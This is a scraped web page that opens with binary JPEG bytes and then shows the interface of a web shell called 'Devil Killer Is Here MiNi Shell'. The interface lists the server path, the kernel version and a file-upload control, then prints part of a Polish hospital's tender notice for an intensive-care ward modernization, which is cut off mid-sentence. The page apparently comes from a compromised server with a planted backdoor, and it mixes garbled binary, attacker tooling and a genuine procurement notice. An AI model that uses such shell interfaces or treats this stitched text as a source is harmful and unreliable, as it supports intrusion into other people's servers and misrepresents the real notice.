JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231222/0057083101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja Oddziału Anestezjologii i Intensywnej Terapii w formule „zaprojektuj i wybuduj” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WIELKOPOLSKIE CENTRUM PULMONOLOGII I TORAKOCHIRURGII IM. EUGENII I JANUSZA ZEYLANDÓW</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">WCPiT</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631250369</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Augustyna Szamarzewskiego 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-569</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wcpit.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wcpit.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja Oddziału Anestezjologii i Intensywnej Terapii w formule „zaprojektuj i wybuduj” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cea5b3ad-a0b3-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00570831</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00006313/34/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Modernizacja Oddziału Anestezjologii i Intensywnej Terapii w formule „zaprojektuj i wybuduj”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wcpit.pl/system-komunikacji-elektronicznej/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Systemu Komunikacji Elektronicznej, zwanego dalej „SKE” oraz poczty elektronicznej:<br/>przetargi@wcpit.org. Adres strony internetowej: https://wcpit.pl/system-komunikacji-elektronicznej/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Systemu Komunikacji<br/>Elektronicznej,zwanego dalej „SKE” oraz poczty elektronicznej:<br/>przetargi@wcpit.org.<br/>2. Szczegółowa instrukcja korzystania z SKE stanowi załącznik do SWZ.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na SKE.<br/>4. Zasady udziału wykonawcy w postępowaniu, w szczególności zasady szyfrowania oferty, wysłania oferty, zmiany oferty,<br/>wycofania oferty określone zostały w Instrukcji korzystania z SKE.<br/>5. Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na SKE.<br/>6. Komunikacja pomiędzy Zamawiającym a Wykonawcami (nie dotyczy składania ofert) w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na SKE. We wszelkiej korespondencji, w tytule i w treści związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia (BZP lub TED lub ID postępowania).<br/>7. Wykonawca chcąc złożyć ofertę za pomocą SKE przygotowuje paczkę dokumentów, która zawiera dokumenty wymagane przez<br/>SWZ. Przygotowaną paczkę dokumentów – ofertę zapisuje w postaci pliku skompensowanego (np.: zip) a następnie szyfruje<br/>programem zewnętrznym – „Kleopatra” gpg4win udostępnionym na stronie https://www.gpg4win.org/index.html (Windows) (patrz pkt.<br/>7.2.1 instrukcji SKE)<br/>– „GPG Suite” udostępnionym na stronie<br/>https://gpgtools.org (MacOS, Linux) (patrz pkt. 7.2.2 instrukcji SKE)<br/>8. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu<br/>Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).<br/>9. Wymagania techniczne korzystania z SKE.<br/>W celu poprawnego korzystania z usług SKE konieczne jest spełnienie przez Użytkownika następujących, minimalnych wymagań<br/>technicznych:<br/>• dostęp do sieci Internet, • posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), • komputer z systemem<br/>operacyjnym Windows7® (lub nowszym), MacOS albo Linux i zainstalowaną przeglądarką internetową z włączoną obsługą<br/>JavaScript oraz cookies.<br/>SKE współpracuje z wszystkimi przeglądarkami internetoowymi (Internet Explorer 10+/Microsoft Edge, Mozilla, Firefox, Google<br/>Chrome, Opera) zalecane jest jednak Google Chrome.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula obowiązku informacyjnego do zastosowania przez zamawiającego w<br/>postępowaniu o udzielenie zamówienia publicznego: &#34;Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informuję, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Wielkopolskie Centrum Pulmonologii i Torakochirurgii im. Eugenii i Janusza Zeylandów z siedzibą przy ul. Szamarzewskiego 62, 60-569 Poznań, będącym Samodzielnym Publicznym Zakładem Opieki Zdrowotnej.<br/>2. W sprawach dotyczących przetwarzania danych osobowych, może się Pani/Pan kontaktować z Inspektorem Ochrony Danych,<br/>mgr Martą Wosińską-Wajs poprzez adres e-mail: daneosobowe@wcpit.org.<br/>3. Podanie danych nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. W zależności od<br/>przedmiotu zamówienia, zamawiający może zażądać podanie danych osobowych na podstawie przepisów ustawy Prawo zamówień<br/>publicznych i przepisów wykonawczych. Konsekwencje niepodania określonych danych wynikają z ustawy PZP, może skutkować Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>a) art. 6 ust. 1 lit. c) RODO (obowiązek prawny wynikający m.in. z przepisów zamówień publicznych) w celu związanym z<br/>przeprowadzeniem postępowania o udzielenie zamówienia publicznego oraz przepisów ustawy Prawo zamówień publicznych i<br/>aktów wykonawczych wydanych na jej podstawie,<br/>b) art. 6 ust. 1 lit. f) RODO realizowania prawnie uzasadnionych interesów Administratora tj. w celu ustalenia obrony lub dochodzenia<br/>ewentualnych roszczeń oraz ochrony osób i mienia należącego do Administratora, a także zapewnienia bezpieczeństwa na terenie<br/>Wielkopolskiego Centrum Pulmonologii i Torakochirurgii im. Eugenii i Janusza Zeylandów (mowa o siedzibie głównej oraz o<br/>ośrodkach zamiejscowych) wykorzystanie wizerunku w ramach monitoringu wizyjnego realizowanego w ramach prawnie<br/>uzasadnionego interesu Administratora.<br/>5. Administrator przetwarza dane zwykłe chronione w zakresie wymaganym danym postępowaniem o udzielenie niniejszego<br/>zamówienia publicznego.<br/>6. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 3 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „Ustawa PZP”.<br/>7. Pani/Pana dane osobowe będą przechowywane przez WCPiT, zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy lub na okres przedawnienia/wygaśnięcia ewentualnych roszczeń z wyłączeniem monitoringu<br/>wizyjnego, o którym mowa w punkcie 12 klauzuli.<br/>8. Administrator dba o poufność danych. Z uwagi jednak na konieczność wypełnienia celu przetwarzania danych oraz zapewnienie<br/>odpowiedniej organizacji pracy może przekazać dane:<br/>a. osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę Prawo zamówień<br/>publicznych i aktów wykonawczych,<br/>b. podmiotom, z którymi Administrator zawarł oddzielne umowy powierzenia przetwarzania danych, w szczególności podmiotom w<br/>zakresie obsługi prawnej, podmiotom świadczącym usługi informatyczne w zakresie platformy zakupowej,<br/>c. podmiotom kontrolującym,<br/>d. lub innym podmiotom upoważnionym na podstawie przepisów prawa...&#34;<br/>Ciąg dalaszy treści &#34;Klauzuli obowiązku informacyjnego&#34; znajduje się w SEKCJI IX – POZOSTAŁE INFORMACJE<br/>SEKCJA IV</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WCPIT/EA/381-85/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 4722686,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest modernizacja (przebudowa) pomieszczeń Oddziału Anestezjologii i Intensywnej Terapii w budynku głównym szpitala w celu dostosowania ich do obowiązujących przepisów oraz poprawy komfortu użytkowania pacjentów i personelu medycznego, polegająca na zaprojektowaniu i przebudowie istniejących pomieszczeń oraz doprowadzenia do zgodności z wymaganiami ochrony przeciwpożarowej w zakresie pionowych dróg ewakuacyjnych (w zakresie ww. oddziału) klatki schodowej A-17 i dojścia do klatki schodowej 19-19 w obrębie bloku operacyjnego i pionowej drogi ewakuacyjnej klatki schodowej A-19.<br/>Przedmiot zamówienia zlokalizowany jest na terenie Wielkopolskiego Centrum Pulmonologii i Torakochirurgii, przewidziany do realizacji na działce nr 74/2, ark. 17, obręb Jeżyce, położonej przy ul. Szamarzewskiego 62 w Poznaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215140-0 - Roboty budowlane w zakresie obiektów szpitalnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45215142-4 - Roboty budowlane w zakresie oddziałów intensywnej opieki</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza będzie oferta z największą liczbą punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na elementy konstrukcyjne i ogólnobudowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na roboty instalacyjne wraz z wyposażeniem technicznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące: <br/><br/>I.	Zdolność techniczna:<br/><br/>(Wariant I)<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie roboty budowlane w formule „zaprojektuj i wybuduj” na kwotę nie mniejszą niż 3 000 000 zł brutto (każda robota), w tym co najmniej jedną robotę polegająca na zaprojektowaniu, budowie, przebudowie lub modernizacji Sali intensywnej terapii lub Bloku operacyjnego.<br/><br/>lub (Wariant II)<br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie roboty budowlane na kwotę nie mniejszą niż 2 900 000 zł brutto (każda robota), w tym co najmniej jedną robotę polegającą na budowie, przebudowie lub modernizacji Sali intensywnej terapii lub Bloku operacyjnego oraz wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum 2 projekty budowlane na kwotę nie mniejszą niż 100 000 zł brutto każdy, w tym co najmniej jedno zaprojektowanie Sali intensywnej terapii lub Bloku operacyjnego.<br/><br/>Zamawiający dopuszcza możliwość wykazania się łącznie doświadczeniem zakresu pkt. a) i b), tj:<br/>- 1 robota w formule „zaprojektuj i wybuduj” + 1 usługa projektowa i 1 robota budowlana.<br/>W tym przypadku wykonawca winien wykazać, że wykonał co najmniej jedną robotę polegającą na budowie, przebudowie lub modernizacji Sali intensywnej terapii lub Bloku operacyjnego w formule zaprojektuj i wybuduj zgodnie lit a) albo co najmniej jedną robotę polegającą na budowie, przebudowie lub modernizacji Sali intensywnej terapii lub Bloku operacyjnego oraz co najmniej jedno zaprojektowanie Sali intensywnej terapii lub Bloku operacyjnego zgodnie z pkt. b)<br/><br/><br/>II. Zdolność zawodowa:<br/><br/>Zamawiający wymaga, aby wykonawca skierował do realizacji zamówienia:<br/>KIEROWNICY ROBÓT<br/>1) Kierownika budowy posiadającego aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno – budowlanej bez ograniczeń, z minimum 5 letnim doświadczeniem zawodowym jako kierownik budowy, w tym przy budowie min. jednego obiektu użyteczności publicznej o powierzchni całkowitej min. 300 m2.<br/>(Przez obiekt użyteczności publicznej rozumiany jest budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej)<br/>2) Kierownika robót posiadającego uprawnienia w specjalności instalacyjnej w zakresie sieci wod-kan, instalacji i urządzeń gazowych, c.o. oraz wentylacyjnych posiadającego min. 5 letnie doświadczenie zawodowe<br/>3) Kierownika robót posiadającego uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającego min. 5 letnie doświadczenie <br/>4)	Kierownika robót posiadającego uprawnienia w specjalności instalacyjnej w zakresie instalacji niskoprądowych (telekomunikacyjnych) posiadającego min. 5 letnie doświadczenie zawodowe.<br/> <br/>Pod pojęciem „doświadczenie zawodowe” należy rozumieć okres od dnia uzyskania uprawnień. <br/>Zamawiający dopuszcza, dla wykazania spełniania warunku udziału w postępowaniu, posiadanie przez jedną osobę dwóch lub więcej powyższych uprawnień.<br/>KADRA PROJEKTOWA:<br/>1)	minimum jednej osoby, która posiada od co najmniej 5 lat uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania - bez ograniczeń - w specjalności architektonicznej, która w okresie ostatnich 5 lat przed upływem terminu składania ofert, była autorem (rozumianym jako osoba pełniąca funkcję generalnego projektanta):<br/>	1 projektu w zakresie budowy lub przebudowy lub remontu Sali intensywnej terapii lub Bloku operacyjnego<br/>2)	co najmniej jedną osobę, posiadającą od co najmniej 5 lat uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania - bez ograniczeń - w specjalności konstrukcyjno- budowlanej, która w okresie ostatnich 5 lat przed upływem terminu składania ofert była członkiem zespołu:<br/>	1 projektu w zakresie budowy lub przebudowy lub remontu Sali intensywnej terapii lub Bloku operacyjnego<br/>3)	co najmniej jedną osobę posiadającą od co najmniej 5 lat, uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, która w okresie ostatnich 5 lat przed upływem terminu składania ofert była członkiem zespołu:<br/>	1 projektu w zakresie budowy lub przebudowy lub remontu Sali intensywnej terapii lub Bloku operacyjnego<br/>4)	co najmniej jedną osobę, posiadającą od co najmniej 5 lat, uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, która w okresie ostatnich 5 lat przed upływem terminu składania ofert była członkiem zespołu:<br/>	1 projektu w zakresie budowy lub przebudowy lub remontu Sali intensywnej terapii lub Bloku operacyjnego<br/>5)	co najmniej jedną osobę, posiadającą od co najmniej 5 lat, uprawnienia do wykonywania samodzielnych funkcji w budownictwie w zakresie projektowania w specjalności niskoprądowej (telekomunikacyjnej), która w okresie ostatnich 5 lat przed upływem terminu składania ofert była członkiem zespołu:<br/>	1 projektu w zakresie budowy lub 